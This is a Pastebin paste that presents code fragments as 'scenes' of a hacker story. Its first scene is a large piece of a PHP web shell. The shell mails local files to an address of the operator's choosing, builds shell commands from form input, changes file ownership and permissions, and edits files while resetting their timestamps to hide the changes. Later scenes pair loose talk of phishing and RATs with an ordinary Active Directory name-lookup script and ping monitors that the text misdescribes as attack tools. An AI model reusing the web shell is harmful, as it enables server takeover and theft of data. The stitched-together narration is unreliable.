Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Scene 1 - Exploit scenario w/ incomplete code, the author is himself one unknown hacker.
- {
- $euserinfo = @posix_getpwuid(@posix_geteuid());
- $egroupinfo = @posix_getgrgid(@posix_getegid());
- echo ws(3).'uid='.$euserinfo['uid'].' ( '.$euserinfo['name'].' ) gid='.$egroupinfo['gid'].' ( '.$egroupinfo['name'].' )<br>';
- }
- else echo ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>";
- echo ws(3).$dir;
- echo ws(3).'( '.perms(@fileperms($dir)).' )';
- echo "<br>";
- echo ws(3)."<b>Your ip: <a href=http://".$_SERVER["REMOTE_ADDR"].">".$_SERVER["REMOTE_ADDR"]."</a> - Server ip: <a href=http://".gethostbyname($_SERVER["HTTP_HOST"]).">".gethostbyname($_SERVER["HTTP_HOST"])."</a></b><br/>";
- echo "</b></font>";
- }
- else
- {
- echo '<font color=blue><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'<br>ip :'.ws(1).'</b></font><br>';
- echo "</td><td>";
- echo "<font face=tahoma size=-2 color=red><b>";
- echo ws(3).@substr(@php_uname(),0,120)."<br>";
- echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
- echo ws(3).@getenv("USERNAME")."<br>";
- echo ws(3).$dir;
- echo "<br>";
- echo ws(3)."<b>Your ip: <a href=http://".$_SERVER["REMOTE_ADDR"].">".$_SERVER["REMOTE_ADDR"]."</a> - Server ip: <a href=http://".gethostbyname($_SERVER["HTTP_HOST"]).">".gethostbyname($_SERVER["HTTP_HOST"])."</a></b><br/>";
- echo "<br></font>";
- }
- echo "</font>";
- echo "</td></tr></table>";
- if(!empty($_POST['cmd']) && $_POST['cmd']=="mail")
- {
- $res = mail($_POST['to'],$_POST['subj'],$_POST['text'],"From: ".$_POST['from']."\r\n");
- err(6+$res);
- $_POST['cmd']="";
- }
- if(!empty($_POST['cmd']) && $_POST['cmd']=="mail_file" && !empty($_POST['loc_file']))
- {
- if(!$file=@fopen($_POST['loc_file'],"r")) { err(1,$_POST['loc_file']); $_POST['cmd']=""; }
- else
- {
- $filename = @basename($_POST['loc_file']);
- $filedump = @fread($file,@filesize($_POST['loc_file']));
- fclose($file);
- $content_encoding=$mime_type='';
- compress($filename,$filedump,$_POST['compress']);
- $attach = array(
- "name"=>$filename,
- "type"=>$mime_type,
- "content"=>$filedump
- );
- if(empty($_POST['subj'])) { $_POST['subj'] = 'file from Anonymous user'; }
- if(empty($_POST['from'])) { $_POST['from'] = 'hardcore@microsoft.com'; }
- $res = mailattach($_POST['to'],$_POST['from'],$_POST['subj'],$attach);
- err(6+$res);
- $_POST['cmd']="";
- }
- }
- if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text")
- {
- $_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\'';
- }
- if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_")
- {
- switch($_POST['what'])
- {
- case 'own':
- @chown($_POST['param1'],$_POST['param2']);
- break;
- case 'grp':
- @chgrp($_POST['param1'],$_POST['param2']);
- break;
- case 'mod':
- @chmod($_POST['param1'],intval($_POST['param2'], 8));
- break;
- }
- $_POST['cmd']="";
- }
- if(!empty($_POST['cmd']) && $_POST['cmd']=="mk")
- {
- switch($_POST['what'])
- {
- case 'file':
- if($_POST['action'] == "create")
- {
- if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { err(2,$_POST['mk_name']); $_POST['cmd']=""; }
- else {
- fclose($file);
- $_POST['e_name'] = $_POST['mk_name'];
- $_POST['cmd']="edit_file";
- echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#cccccc><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>";
- }
- }
- else if($_POST['action'] == "delete")
- {
- if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#cccccc><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>";
- $_POST['cmd']="";
- }
- break;
- case 'dir':
- if($_POST['action'] == "create"){
- if(mkdir($_POST['mk_name']))
- {
- $_POST['cmd']="";
- echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#cccccc><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>";
- }
- else { err(2,$_POST['mk_name']); $_POST['cmd']=""; }
- }
- else if($_POST['action'] == "delete"){
- if(rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#cccccc><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>";
- $_POST['cmd']="";
- }
- break;
- }
- }
- if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file" && !empty($_POST['e_name']))
- {
- if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); }
- if(!$file=@fopen($_POST['e_name'],"r")) { err(1,$_POST['e_name']); $_POST['cmd']=""; }
- else {
- echo $table_up3;
- echo $font;
- echo "<form name=save_file method=post>";
- echo ws(3)."<b>".$_POST['e_name']."</b>";
- echo "<div align=center><textarea name=e_text cols=121 rows=24>";
- echo @htmlspecialchars(@fread($file,@filesize($_POST['e_name'])));
- fclose($file);
- echo "</textarea>";
- echo "<input type=hidden name=e_name value=".$_POST['e_name'].">";
- echo "<input type=hidden name=dir value=".$dir.">";
- echo "<input type=hidden name=cmd value=save_file>";
- echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">"));
- echo "</div>";
- echo "</font>";
- echo "</form>";
- echo "</td></tr></table>";
- exit();
- }
- }
- if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file")
- {
- $mtime = @filemtime($_POST['e_name']);
- if(!$file=@fopen($_POST['e_name'],"w")) { err(0,$_POST['e_name']); }
- else {
- if($unix) $_POST['e_text']=@str_replace("\r\n","\n",$_POST['e_text']);
- @fwrite($file,$_POST['e_text']);
- @touch($_POST['e_name'],$mtime,$mtime);
- $_POST['cmd']="";
- echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#cccccc><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>";
- }
- }
- if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C"))
- Scene 2 - The hacker has access to everything when the 'server is pwned', in other words, the database, list of contacts, clients and personal information. There are many techniques to leverage access and the most common are sql attacks, but skilled hackers will look for backdoors and run attacks with APTs and RATs. The first step of an exploit is usually an email to hook the target with a crafted message and hyperlink he would open because the 'spam filter' didn't work out and he feels it's okay ()
- Scene 3 - Script to identify active accounts in the target's directory or vulnerable computers in order to steal passwords and login information. The hacker won't need to change the -ip address every 30 secs, but he can do so to exploit further the network under his control. Although 30 secs is only possible for ddos attacks. ()
- [CmdletBinding()]
- param(
- [parameter(Mandatory=$TRUE,Position=0)]
- [validateset("NT4","1779","SPN","canonical","GUID","DN","UPN","display","domainSimple","enterpriseSimple","canonicalEx")]
- [String] $OutputType,
- [parameter(Mandatory=$TRUE,Position=1,ValueFromPipeline=$TRUE)]
- [String[]] $Name,
- [validateset("NT4","1779","SPN","canonical","GUID","DN","UPN","display","domainSimple","enterpriseSimple","canonicalEx","SIDorSidHistory","unknown")]
- [String] $InputType="unknown",
- [validateset("domain","server","GC")]
- [String] $InitType="GC",
- [String] $InitName="",
- [Switch] $ChaseReferrals,
- [System.Management.Automation.PSCredential] $Credential
- )
- begin {
- # Hash table to simplify output type names and values
- $OutputNameTypes = @{
- "1779" = 1;
- "DN" = 1;
- "canonical" = 2;
- "NT4" = 3;
- "display" = 4;
- "domainSimple" = 5;
- "enterpriseSimple" = 6;
- "GUID" = 7;
- "UPN" = 9;
- "canonicalEx" = 10;
- "SPN" = 11;
- }
- # Copy output type hash table and add two additional types
- $InputNameTypes = $OutputNameTypes.Clone()
- $InputNameTypes.Add("unknown", 8)
- $InputNameTypes.Add("SIDorSidHistory", 12)
- # Same as with previous hash tables...
- $InitNameTypes = @{
- "domain" = 1;
- "server" = 2;
- "GC" = 3;
- }
- # Accessor functions to simplify calls to NameTranslate
- function invoke-method([__ComObject] $object, [String] $method, $parameters) {
- $output = $object.GetType().InvokeMember($method, "InvokeMethod", $NULL, $object, $parameters)
- if ( $output ) { $output }
- }
- function get-property([__ComObject] $object, [String] $property) {
- $object.GetType().InvokeMember($property, "GetProperty", $NULL, $object, $NULL)
- }
- function set-property([__ComObject] $object, [String] $property, $parameters) {
- [Void] $object.GetType().InvokeMember($property, "SetProperty", $NULL, $object, $parameters)
- }
- # Create the NameTranslate COM object
- $NameTranslate = new-object -comobject NameTranslate
- # If -Credential, use InitEx to initialize it; otherwise, use Init
- if ( $Credential ) {
- $networkCredential = $Credential.GetNetworkCredential()
- try {
- invoke-method $NameTranslate "InitEx" (
- $InitNameTypes[$InitType],
- $InitName,
- $networkCredential.UserName,
- $networkCredential.Domain,
- $networkCredential.Password
- )
- }
- catch [System.Management.Automation.MethodInvocationException] {
- write-error $_
- exit
- }
- finally {
- remove-variable networkCredential
- }
- }
- else {
- try {
- invoke-method $NameTranslate "Init" (
- $InitNameTypes[$InitType],
- $InitName
- )
- }
- catch [System.Management.Automation.MethodInvocationException] {
- write-error $_
- exit
- }
- }
- # If -ChaseReferrals, set the object's ChaseReferral property to 0x60
- if ( $ChaseReferrals ) {
- set-property $NameTranslate "ChaseReferral" (0x60)
- }
- # The NameTranslate object's Set method specifies the name to translate and
- # its input format, and the Get method returns the name in the output format
- function translate-adname2([String] $name, [Int] $inputType, [Int] $outputType) {
- try {
- invoke-method $NameTranslate "Set" ($inputType, $name)
- invoke-method $NameTranslate "Get" ($outputType)
- }
- catch [System.Management.Automation.MethodInvocationException] {
- write-error "'$name' - $($_.Exception.InnerException.Message)"
- }
- }
- }
- process {
- Foreach($item in $name){
- translate-adname2 $name $InputNameTypes[$InputType] $OutputNameTypes[$OutputType]
- }
- }
- }
- Scene 4 - The hacker is caught once he decided installing this new 'software' from the hacked database, it's okay doing it but he didn't disable automatic update, trying to stop this immediately is not enough, he is connected to the Internet and an inevitable error message was delivered to the IT guy to the email admin@autoupdate-db.com
- He screwed it! This is what he can see on his desktop before panicking ()
- #=== PARAMETERS change them here
- # add ip / hostname separated by white space
- HOSTS="www.autoupdate-db.com"
- # no ping request
- COUNT=40
- # email report when
- #SUBJECT="Ping failed"
- #EMAILID="admin@autoupdate-db.com"
- #=== Local vars (do not change them)
- # Cron-friendly: Automaticaly change directory to the current one
- cd $(dirname "$0")
- # Current script filename
- SCRIPTNAME=$(basename "$0")
- # Current date and time
- today=$(date '+%Y-%m-%d')
- currtime=$(date '+%H:%M:%S')
- #=== Help message
- if [[ "$@" =~ "--help" ]]; then
- echo "Usage: bash $SCRIPTNAME
- Check the rate of packets loss and output the result in a file named plwatch.txt in the same directory as this script.
- Note: this script is cron-friendly, so you can add it to a cron job to regularly check your packets loss.
- "
- exit
- fi
- #=== Main script
- for myHost in $HOSTS
- do
- msg=$(ping -c $COUNT $myHost | grep 'loss')
- echo "[$today $currtime] ($myHost $COUNT) $msg" >> plwatch.txt
- #count=$(ping -c $COUNT $myHost | grep 'received' | awk -F',' '{ print $2 }' | awk '{ print $1 }')
- #if [ $count -eq 0 ]; then
- # 100% failed
- # echo "Host : $myHost is down (ping failed) at $(date)" | mail -s "$SUBJECT" $EMAILID
- #fi
- Scene 4 - This is what he can see in another window ()
- - - - 8< - - -
- #address=192.168.1.99 # forced bad address
- address=83.170.69.51 # www.autoupdate-db.com
- internet=1 # default to internet is up
- x=0
- while true;
- do
- # %a Day of Week, textual
- # %b Month, textual, abbreviated
- # %d Day, numeric
- # %r Timestamp AM/PM
- echo -n $(date +"%a, %b %d, %r") "-- "
- ping -c 1 ${address} > /tmp/ping.$
- if [[ $? -ne 0 ]]; then
- if [[ ${internet} -eq 1 ]]; then # edge trigger -- was up now down
- echo -n $(say "Internet down") # OSX Text-to-Speech
- echo -n "Internet DOWN"
- else
- echo -n "... still down"
- fi
- internet=0
- else
- if [[ ${internet} -eq 0 ]]; then # edge trigger -- was down now up
- echo -n $(say "Internet back up") # OSX Text-To-Speech
- fi
- internet=1
- fi
- cat /tmp/ping.$ | head -2 | tail -1
- sleep 30 ; # sleep: 60 seconds = 1 min
- done
- - - - 8< - - -
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement